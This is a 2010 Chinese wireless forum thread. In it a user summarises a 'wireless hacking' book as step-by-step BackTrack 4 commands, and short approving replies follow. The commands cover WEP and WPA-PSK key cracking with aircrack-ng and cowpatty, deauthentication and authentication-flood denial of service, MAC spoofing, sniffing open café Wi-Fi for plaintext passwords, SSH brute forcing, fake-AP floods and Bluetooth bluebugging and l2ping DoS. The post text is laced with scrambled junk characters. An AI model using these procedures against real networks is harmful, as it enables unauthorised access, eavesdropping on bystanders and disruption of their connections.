查看: 10772|回复: 35

[转载] 《无线黑客傻瓜书》读后总结

[复制链接]

主题

好友

3719

积分

少校

签到天数: 14 天

[LV.3]偶尔看看II

发表于 2010-2-10 10:59 |显示全部楼层
TG-NET
Anywlan微信公众号
这本书看了一个星期,终于看完了,现把书上的精华总结成如下内容,条理化知识点。
+ ^4 b0 D$ _5 j
/ t' c* U/ ^0 H5 z6 r5 p+ j以下所有操作均在BackTrack 4中进行。
% C: _( ~$ n, T4 z, [0 P8 }) v& l9 l4 Z- ^1 B
# V- V# w* H9 v% p* G, ?2 I
无线WEP加密P解:
" y# \6 D% w; I, t$ o4 P3 w; M
& r% N& v/ I/ F2 i5 ~6 U* C1 {注入P解:# r$ b9 f0 r3 w

  I3 ^; I4 e1 Z" c# iifconfig, F" l! E& _: E0 T  b
8 e2 J  ]3 w$ K5 j! J: U; [
ifconfig –a
) n$ f8 g6 D1 R/ s; H, C# P$ n# v' y8 a
- {! t- }% z4 t: G! s) G: eifconfig wlan0(无线网卡) up
3 _% j* J4 f' Q) N7 m$ a- e
+ A+ _& m; e, Bairmon-ng start wlan0
1 a( x: l- d$ {" j
8 U! {8 G0 E" J) x& c/ Cairodump-ng mon0
: z9 d6 S4 j4 C8 A7 J% q
2 F7 U3 J( r! Oairodump-ng --ivs –w ivsfile –c 频道 mon0或
  k9 y. B1 [1 i; t9 R" J2 g& J! ~7 R( S
airodump-ng --output-format ivs --ivs –w ivsfile –c 频道 mon0
7 b( Z) C$ i! H
9 ]* q& k- L+ u: Caireplay-ng -3 –b BSSID –h Station mon0, \6 y  [& V4 a+ m9 u! n

' B% Y; S, n( `4 caircrack-ng ivsfile-01.ivs
$ k3 [0 h2 e! {8 M4 g3 n  p2 i
0 a/ N! g+ n6 V8 V; l- b0 x  i虚连接P解(适用于无客户端连接APP解)$ k- ]1 g9 v6 `

  q% j  f. F9 C* `' Uifconfig9 P6 a7 w/ B) X5 }4 h: E, U

0 |" o- _* T1 _* p) c2 kifconfig –a* a' a( s- A) @' k. o  u1 a- e
/ g0 Q- ~. S0 @. S- _* x* O6 r9 s8 x
ifconfig wlan0(无线网卡) up- m4 R1 k0 N+ d" C9 \" R3 r
3 V+ C; A( f8 r3 {3 Z5 p4 b- d
airmon-ng start wlan0
$ i, g2 D4 @* R
; A1 e; [, V# P$ ]( j1 ^2 d9 I) `; _/ tairodump-ng mon0) A9 W3 N0 P0 h5 L  \( e0 k' v

7 K* h6 l; m2 C7 Rairodump-ng --ivs –w ivsfile –c 频道 mon0或, `" G+ g* v0 e% X7 j, r

1 A& J+ j! V2 l$ [7 vairodump-ng --output-format ivs --ivs –w ivsfile –c 频道 mon0
6 R& t0 c& T8 n* U5 K) P. D, A3 N# l/ C( Z% k
aireplay-ng -1 0 –e SSID –a BSSID –c Station mon0
# L, o  ]& Y" ~9 F( R' N* Q# a  |% E2 w1 t* ~1 A
aireplay-ng -2 –p 0841 –c ffffffffffff –b BSSID –h 自己的MAC mon0# p1 u: O4 J4 e$ E: ]
, w! B8 |0 m) E; P: O
aircrack-ng ivsfile-01.ivs, U( X  d, `) j5 d

2 f6 b5 c3 v" m0 e+ G
. `$ }8 {3 i2 t0 f还有傻瓜式P解软件SpoonWEP2,SpoonWEP2中的Chopchop和Fragment来进行无客户端P解,P解时客户端MAC栏留空。  f$ g9 x; Q6 Y" p+ e+ N9 A! P( u2 _) i

& }# M* r/ B& n* W% t  {2 B- e' [/ Q1 M( p1 \3 X5 ~  Y9 F* _
WPA-PSKP解
' t' }0 U. o" |  R' c0 i
& i0 O5 P4 a- M' k4 e/ x* j: Gifconfig' S. I" k2 G; S0 N8 {  }2 y7 I
& s) j. a' [$ Q& l8 F7 [
ifconfig –a
" L" x" _! E- m, E( |
" o  A. H$ U  [) m( xifconfig wlan0(无线网卡) up
6 g: s% }$ ]/ m: F8 i# E  S6 w8 `
9 ^. N9 c& h2 x" Rairmon-ng start wlan04 c6 d' t: T% w6 }

6 D& H8 i( N: g4 Xairodump-ng mon0
0 q0 Z5 V6 P" @( n# |9 L7 y. \; {5 }$ B1 x4 k& j
airodump-ng –w capfile –c 频道 mon0
2 D8 F& P& k9 Y3 `. V
: A7 ?  s7 B8 P, aaireplay-ng -0 10 –a BSSID –c Station mon0 //Deauth洪水攻击使合法客户端掉线捕获其与AP连接时的握手数据包2 _5 d1 X8 p$ e% M

& `" j2 d' |' zaircrack-ng –w Dic capfile-01.cap或" l' D3 s5 Z* O/ n- z% ^1 ?
) a0 b( X3 B8 T- q. k) b
cowpatty –f Dic –r capfile-01.cap –s SSID
( i, Q8 q& A8 j* a' v
! j+ K4 q: I: p. E( W4 rcowpatty –d HashTable.Hash –r capfile-01.cap –s SSID- n& C2 D9 Z5 w9 h
! z, |3 u) \: T
傻瓜式P解软件SpoonWPA。
% o+ l; g2 {# W, k& |# c$ T( z3 T# I6 O  x
BT4下自带的字典文件:/pentest/passwords/wordlists/darkc0de.lst, D( S3 p: _2 m9 W5 I; O* G: r8 @
7 h& D. Y; ~8 H' P( q

& a# O* E6 x' P; `# `字典文件的生成和上传- |5 ]3 W4 X8 |+ B6 b

8 Q( c  a* }$ H+ K* X2 J/ I  t在windows下使用生日密码生成器和社会工程学密码生成器 等生成字典。然后在BT4下开启Tftp、SSH或使用U盘传输。
- p& e- w( ~# h7 G/ D
& Z$ s0 E9 J; d6 X& N. \) `* `  I6 ]6 `
BT4下开启Tftp:Services—TFTPD—start TFTPD- Q/ B6 [) E2 P0 p
* n4 x" Q& ^; m3 l% l! v/ }) {
在Windows的CMD中运行 tftp –i IP put **.dic
& F& G" H& w) @
! p6 Z4 M" x8 G
3 N+ ?; z2 n4 F! x& cBT4下开启SSH:Services—SSH—start SSH# G7 h/ o' y: T- a2 X& q) G* A* X, T
+ Q9 c% x% ^  F- g* b/ v" ]
Windows下使用CuteFTP新建连接:File--New—SFTP(SSH2)连接。使用BT4的root用户登录,前提是设置、修改密码:passwd root5 J  o' N" _' c
  Y+ R* N+ _  T3 J# g

2 I6 x4 i, G3 j( C+ I/ j4 vAP限制MAC时的解决4 x3 t* C; l9 Y( z- ?$ W1 F- \
" \6 t2 K% e3 \
当AP限制IP连接时,可以伪造为合法用户的MAC,关于AP连接的用户以及MAC,可以使用airodump-ng mon0查看。在BT4下修改MAC的命令为:
2 t: f: v+ B2 n6 d5 L% b6 Q' r& D& O
ifconfig wlan0 hw ether NewMAC
5 D/ a" o1 P# G! X4 `7 x; G! I7 t
7 r6 M& d  A" P7 d6 [" w" q
关闭SSID广播的AP探测:- W, e% f, }7 h" a* `2 Z
2 j& T0 C* q! I7 E) j( ~0 f
1.     Deauth攻击:# n) k; P0 c& h$ N0 V9 t( C

% M0 f# E; d+ a' \( W$ d" Jairodump-ng mon0
' b; d6 B* @: J0 M
8 f2 g& s7 u9 O+ N; {+ P' ~aireplay-ng -0 10 –a BSSID –h Station mon0  m# B$ I: p$ s/ p3 N9 {
2 |# B) J2 q" E
2.     抓包分析
! S3 q9 J* ~9 P, _: I* A
; E, o- k- C! I5 y1 P3 r1 e2 fOmnipeek
; _  ^& a4 G* ?) G7 t& i, E' U) ^) \# A" \8 e: ^4 W2 _
Tcpdump –n –e –vvv –i 网卡名" `" A) v; N8 W1 \3 i. s7 U

' D6 N: r- Y6 U8 g3.     暴力P解
7 m7 j* J$ k$ q9 V% O  A$ `3 N1 L- @/ Z" A: ~& P
Charon 1.1暴力P解. B: f# q( p0 W0 y# ~/ C

  z5 P/ U7 \3 k0 U9 J1 e8 W
  S/ C% h9 s8 Z1 Q. i/ i( Y6 @$ D无线加密数据包的解密- K) P: v8 x3 B
* e; ^# C4 ]/ B( ], p

! K6 H8 ^; W+ ]9 T/ d使用airodump-ng –w capfile –c 频道 mon0 捕获数据包并P解AP的密码 ,使用Cain的Cracker项在802.11Capturea导入解密。解密完后的数据包用Wireshark打开即可分析。5 A# p+ t6 f% {) y
! R* a/ Y7 {6 u2 m* W
FilterNS     DNS解析数据包. @. t  V" d7 y) t0 o
* ~9 Q# `7 `+ s
Filter:HTTP    WEB访问数据包/ H, h- G( g, B4 V$ a
5 e% I# w, \# K0 k# D
Filter:msnms   MSN% g3 r1 z# K) D+ _1 w+ U2 D
. x' x* x4 P# [
Ctrl+F查找pass可以寻找一些明文的密码,如论坛等使用非SSL连接的账号。
7 W; Y3 Y' T$ h. v! ^4 H6 z6 ^$ P5 ?: A! M0 ^  W" ?/ `
使用airdecap-ng解密:
% m8 g2 b1 V+ [8 \6 t' x+ V4 ^' i3 O9 W( T" P! o7 F/ l: l1 n
Airdecap-ng –b BSSID –e SSID –w 密码 ***.cap
: W) X' }% c4 ?0 e4 t" T% [
& c: x$ y% T) @) M9 H6 f! H5 @/ w" I3 n3 O
咖啡馆中无线数据截取(开放式无加密AP)
2 U$ ^' T" n& P$ W+ j& |4 ^  U7 a- a8 |8 C- L1 ?- Z
1.Airodump-ng –w data –c频道 mon0
7 T- f% p; t; [$ {. R9 x  Y+ c+ M9 u
6 J! m) P+ V5 X# k9 F2.使用WireShark打开分析
% l' Z) x& B9 q& T1 R- n. O: Y" o! U7 B
: N$ n( e4 V+ N6 g% Q+ Q5 g6 v! e
BT4下的渗透工具:
* b" v* U4 t5 ]& r8 [7 D' R
4 w0 ~' K2 f1 C* f! P0 h# dnmap –sP IP/24        判断C段下存活的主机 & f7 d. `9 |- E

$ H0 C. j1 \( H+ r' C+ }" hnmap –vv –sS IP/24 –p Port    扫描指定端口是否开放
* u6 R) X, I: F! ]
6 Q9 L) [  n2 I2 |+ I3 y! ~9 Snmap –vv –sV IP –p port   指定端口的详细信息。。。* B$ `' I6 C$ g

8 k5 Z3 C- ?# E8 r! ]2 U4 Enamp –O IP/24    判断主机的系统版本
$ \1 c$ u1 m& h) ]
+ b9 E# B: S. ^% |( E' N" O  S# i+ h( ~6 e
GUI 版nmap:Zenmap . C: Z$ O9 Q, Z# k; X
, [4 v: r$ |  [! P0 L% n8 |

& j& |. l/ `- {! \Amap使用:amap –B IP port5 j+ N5 m9 L+ @0 I$ }. A3 Q9 j
# S* w: B8 f1 U2 ~$ W
Nbtscan(扫描Windows网络NetBios信息):  A' y' w+ p- w1 F/ |" t0 W# ]0 {  u

& v  r' |7 F( }2 W/ G" t" V- y0 N& rnbtscan –v –s : IP/24
9 S' }7 v+ k4 |8 `- H# B0 N, K6 a  J: ]; G' w& W
nbtscan –r IP
! m2 v! S2 ^0 n2 t8 ?4 |6 ~
: E- B8 ^" W5 F9 d8 n3 J" B* ~2 P, P% T6 |
DNSWalk(指定域名的DNS探测):./dnswalk XXX.com./ }+ s+ T0 x) i3 y' z- w

' _+ I' C" C5 i: [4 D5 \5 o
2 J4 A' W. P. gHydraP解工具(backtrack—Privilege Escalation—PasswordAttacks—OnlineAttacks)* c0 A, F2 O- D. ^
  s1 |6 h# K0 H' f/ w1 A
BruteSSH: ./bruthe.py –h IP –u Username –d Dic
& n6 v, w, ]' B6 U% }- T7 U+ q5 e% P! @8 L
Metasploit3使用
3 a& ~3 H* W0 k3 Z. n: u无线D.0.S
% J- c( _. y7 J, U* D+ Y5 L. k$ [7 E

* H0 q( c" [$ J3 ]Auth Flood 攻击(Authentication Flood Attack,身份验证洪水攻击)# f( y/ b7 R; o+ _

- `! z; E9 o: D. {! E, l6 oairmon-ng start wlan0
* P* n4 I: O. k$ {
$ _, e3 S! m9 k6 k# rairodump-ng mon05 ^# n8 D* J) S( k. X
8 n  m; T. S; i* P  Q
mdk3 mon0 a –a BSSID" b! @$ a6 B! R! w

: C+ ?, O# g+ P7 a; y; X对所有的AP攻击:mdk3 mon0 a. w2 O$ e# S( Z# m  z/ v

  \3 T$ {0 T- W- _# w0 B1 ^9 p) V* J7 m: Z$ P' K; y
Deauth Flood 攻击
. R, U( L! p9 w% j8 e' i% _
- I3 q; ?8 B9 Rmdk3 mon0 d –c Channel
! U- s7 x% n+ R5 c) B7 a0 W5 t5 u7 s' k
图形化D.O.S攻击:Charon' k) [0 B9 K- a, q1 J

% ]2 H! N# A8 e: U$ O8 ^) f: p3 J2 Y7 C+ j: G# e
当受到攻击时,使用Wireshark抓包可以看到异常信息。
8 k4 o  M+ ^  Z- p6 D5 M6 n3 O$ J/ N9 ~3 k( [) o

7 Q8 L( [+ N7 {( KWPA-PSK高速P解
: |" C8 Y1 n1 u: K3 J# [( L7 Q  q/ B5 K; I
1.       WPA-PSK PMK Hash TablesP解
' k5 b, U) N  X, Y2 k5 O% V: D0 k+ P% V- k" k' M5 V
Cowpatty –d HashTable.hash –r ***.cap –s SSID9 }, L9 q& s: g7 o  k
( P1 F  B6 n! x# |: Y2 U2 H# m
Hash Tables的制作: genpmk –f Dic –d SaveHash –s SSID( ]! G+ T+ k7 l, W

8 ^5 b& b, w' M2.       GPU辅助高速P解7 B, d7 ?$ v) h8 k4 V6 j1 ]

5 h. A1 T1 T6 A7 E3 j$ J! e使用EWSA(Elcomsoft Wireless Security Auditor,无线安全审计工具)导入WPA握手数据包P解,未注册版P解后密码只显示2位,但是可以使用WinHex查看(ALT+F9)ewsa进程的内存,搜索 密码的前两位。就可以看到完整密码。! ?& l2 ~' O6 m6 V, f3 a# J
% O+ `+ w& Q- y8 G5 P6 u* S% m% H
3.       分布式P解
6 `6 a# i9 ~/ p) Z3 n2 c
  p; U0 q; `( D  m3 }
9 n( s$ \7 W9 r7 HAP的伪造# d2 c1 `: o) U7 k0 t

6 ^; d2 a0 o/ }! l把AP的MAC改成目标AP的MAC+ Z3 ~: g% u3 b) d$ |; t7 w

( ]. H! f) {0 [7 B% X6 k网卡软AP5 O% @. N1 B' v, K5 r

' `/ Y% {; {! T8 y; i+ T
4 E) n; g+ L( _4 R0 p# n伪造大量虚假AP信号:4 H  @9 ?# j, \& v$ f
/ x' b; z5 e: n, T  f. q6 B
随机SSID:mdk3 mon0 b –g –c 频道 4 z3 }( i. L4 x
' P" R- E" q. I) Z; H& r2 Q( D
指定SSID:mdk3 mon0 b –g –c 频道 –n SSID –s 速度
; Y' F" P  [, H2 d
" ]  a2 T) a. M, B; ]# [
& v8 D' p( y9 P# _( TWar-Driving
3 z$ \1 V$ z  E) R
/ h  s& \# P& E) z' p! L: h1 m4 I热点地图绘制
/ X6 L' ~, s' g& \3 P
* A  Q9 t! F4 L5 I7 D/ \( H% [( YWindows Mobile系统智能手机配合GPS模块,使用WIFifofum探测,把结果导出为kml(Google Earth可识别格式),在Google Earth中打开即可完成热点地图绘制。8 l6 W- ?# s' {( Z& N% X& ^) a
7 Z6 O5 z3 z3 z5 p9 Z

( E; h5 g3 x) Y/ ^Netstumble7 T: \& r4 j3 L: D, V7 X
) q' u1 p; U2 D' |& v
8 M7 T3 O2 G) U/ G! r0 ]
蓝牙Hacking
4 m2 H# r4 @4 }
9 s6 X6 F& \7 wWindows下的Blue Soleil工具' q3 _6 s% k* \  E4 r4 p7 V

, {6 M1 D3 s- a0 p8 NBT4:
# R: c6 [: G. L& a5 O+ Q6 B) y, O& B4 U2 Q3 N
hciconfig 查看蓝牙适配器
" Z5 @8 ]9 ]! b' j/ R# F& A- {! `7 p; m6 }
hciconfig hci0 up 载入蓝牙适配器
* J& W/ R: x# m
: L4 y  N  F5 T1 H! X" Lhciconfig hci0 class 蓝牙适配器详细信息7 x* m/ k/ ?, N6 T
% n0 ?/ }& }* _

' e  z" `9 M% F- ]) Whcitool(扫描蓝牙)# d& |. C7 ~* Y/ o3 F

1 q6 ^5 @3 H2 Whcitool –i hci0 scan/ L9 E& i9 g" Y% [6 f( V: q) ]$ s
; Q5 h) n. `+ B) Q9 g# d  L
BTscanner(扫描蓝牙)& g0 P8 {6 ^. t0 p9 w

% [6 |* d& u, r! f; L4 g
# `8 k2 f. p; v( i0 u蓝牙攻击:
' _! [5 g0 q( W
& x0 \& n% X5 K5 ~BlueBugging (适用于BlueTooth V1.1的手机)
9 A9 ^' i9 \8 {; s' n5 ]1 }" Q4 @+ M5 I& i5 @) {. p
Bluebugger工具:) M- Z* n. T6 d1 C1 @8 s
: @8 [9 F" h9 p2 R
Bulebugger –a HD_Addr info
, w2 R. g: p: |/ e7 ?9 A
$ I7 l/ P+ t" j5 Q& D( l# y3 D- S3 I+ t2 q$ N7 V+ p+ J
BlueJacking
0 L% F4 b, }9 G, ~# t. L) V9 L: r- v1 ~4 A& I, ]7 w9 p; T
实现方法:使用手机伪造假的名片,里面写上消息内容然后发送。
1 O. p9 D* G2 m" E1 P
/ t, P7 S! a9 N4 q! U# l* a0 r% o0 J; f8 V9 ]$ V: i' M. r
HD_Addr修改:  {. v4 ?) t! W  Y% S7 U; t
; u2 F5 b: i& x$ p% g/ S
Bdaddr工具
! ^+ k% c  U% t! o% |% ~. ?! }8 I# V& y
bdaddr –i 蓝牙设备名 新HD_addr$ @6 H& I. r( e* O

8 i0 l: @. Y6 E  B& _1 e1 L
; {; n6 h/ b. D$ v8 z蓝牙D.O.S! f' ^( }  U+ O# x* ]* _

% }% `  M* g9 m8 C# tl2ping工具(蓝牙连通性测试工具),改变其发包数据包大小,使目标设备拒绝服务
) D( Q% }# ^8 d: W% Y* M3 W. Y' Z$ f  v* W4 `
hciconfig$ O. j5 l) E  g3 ~

  Y# W  R, f9 F2 A' T: Chciconfig hci0 up1 R5 C* g& d+ L  x
) g! P) l. }+ z
hcitool –i hci0 scan
5 D% r1 P+ C. ?1 J2 q% s* _( T: P0 V  _2 q! I0 P/ p
l2ping –s 10000 –目标MAC$ ~5 f1 ]4 j) G4 {& z* s& Q
% N  v3 a( F' E  ]8 C

- o& Q5 P9 F' k$ O) D不可见状态的蓝牙通过RedFang暴力P解(暴力尝试所有的HD_Addr)(概念性的软件)
9 E# I" e- z) z/ ?& M, `8 a1 d4 x) O  w
./fang –r ************-############ -s6 c. f6 `3 B& b& L# O8 j0 @

- b' Z9 Z, H% V暴力P解************-############的蓝牙设备
+ h+ F* O6 e6 X8 A7 l  h% a  Z( I+ \- S8 a! z* d7 X5 m- j0 U2 [
./fang –l 各厂商BD_Addr分配
# V6 A9 ~# G7 y$ ?, f/ Q* V2 O8 ~
  a6 I) F! k! A; e: R# B. s$ p5 \+ g
WifiZoo使用  }& u8 G( U9 t# T' E' I' y

, m& T  C$ p5 T' U- G, F./wifizoo.py –c Capfile
7 O# h4 k, K& t8 p3 n0 a) R9 T: l' o/ A) x; O" \
访问127.0.0.1:8000即可登录Wifizoo管理页面,查看数据包分析的详情

评分

2

查看全部评分

主题

好友

835

积分

中尉

该用户从未签到

发表于 2010-2-10 11:16 |显示全部楼层
传说中的沙发?
回复

使用道具 举报

主题

好友

140

积分

上等兵

该用户从未签到

发表于 2010-2-10 11:35 |显示全部楼层
我还正在学习中,先收藏。
回复

使用道具 举报

主题

好友

2266

积分

少校

签到天数: 2 天

[LV.1]初来乍到

发表于 2010-2-10 12:42 |显示全部楼层
总结的很好~谢谢分享
回复

使用道具 举报

主题

好友

1138

积分

上尉

签到天数: 5 天

[LV.2]偶尔看看I

发表于 2010-2-10 18:31 |显示全部楼层
分享成功的经验
回复

使用道具 举报

主题

好友

257

积分

少尉

该用户从未签到

发表于 2010-2-12 14:43 |显示全部楼层
呵 ....正在努力学习当中....
回复

使用道具 举报

主题

好友

760

积分

中尉

该用户从未签到

发表于 2010-2-14 14:51 |显示全部楼层
Exellent digest
回复

使用道具 举报

主题

好友

909

积分

中尉

签到天数: 13 天

[LV.3]偶尔看看II

发表于 2010-2-20 23:51 |显示全部楼层
谢谢看了!
回复

使用道具 举报

主题

好友

107

积分

上等兵

该用户从未签到

发表于 2010-2-20 23:54 |显示全部楼层
谁有电子的。
2 `/ k) C) \+ A# ^2 Z借来看看。
回复

使用道具 举报

主题

好友

157

积分

上等兵

该用户从未签到

发表于 2010-3-5 19:27 |显示全部楼层
LS的 估计不可能的 会被管理员和谐的4 K; Z8 U& C# w2 _8 r7 E
呵呵 其实也不贵 21块 快递再一点: X9 t0 ^( r* h8 X* D$ G  k$ X! t
我们也支持一下超级版主这么多年对我们的解答哈
回复

使用道具 举报

主题

好友

487

积分

少尉

该用户从未签到

发表于 2010-3-6 00:31 |显示全部楼层
回复有理,顶贴无罪
回复

使用道具 举报

主题

好友

167

积分

上等兵

该用户从未签到

发表于 2010-3-8 18:56 |显示全部楼层
顶起~~~~~~~~~
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 我要加入

本版积分规则

Archiver| 手机版| 中国无线门户 ( 粤ICP备11076993 )  |网站地图    小黑屋 | 免责声明

GMT+8, 2016-12-3 06:12

Powered by Discuz! X3.2

© 2003-2013 广州威思信息科技有限公司

返回顶部 返回列表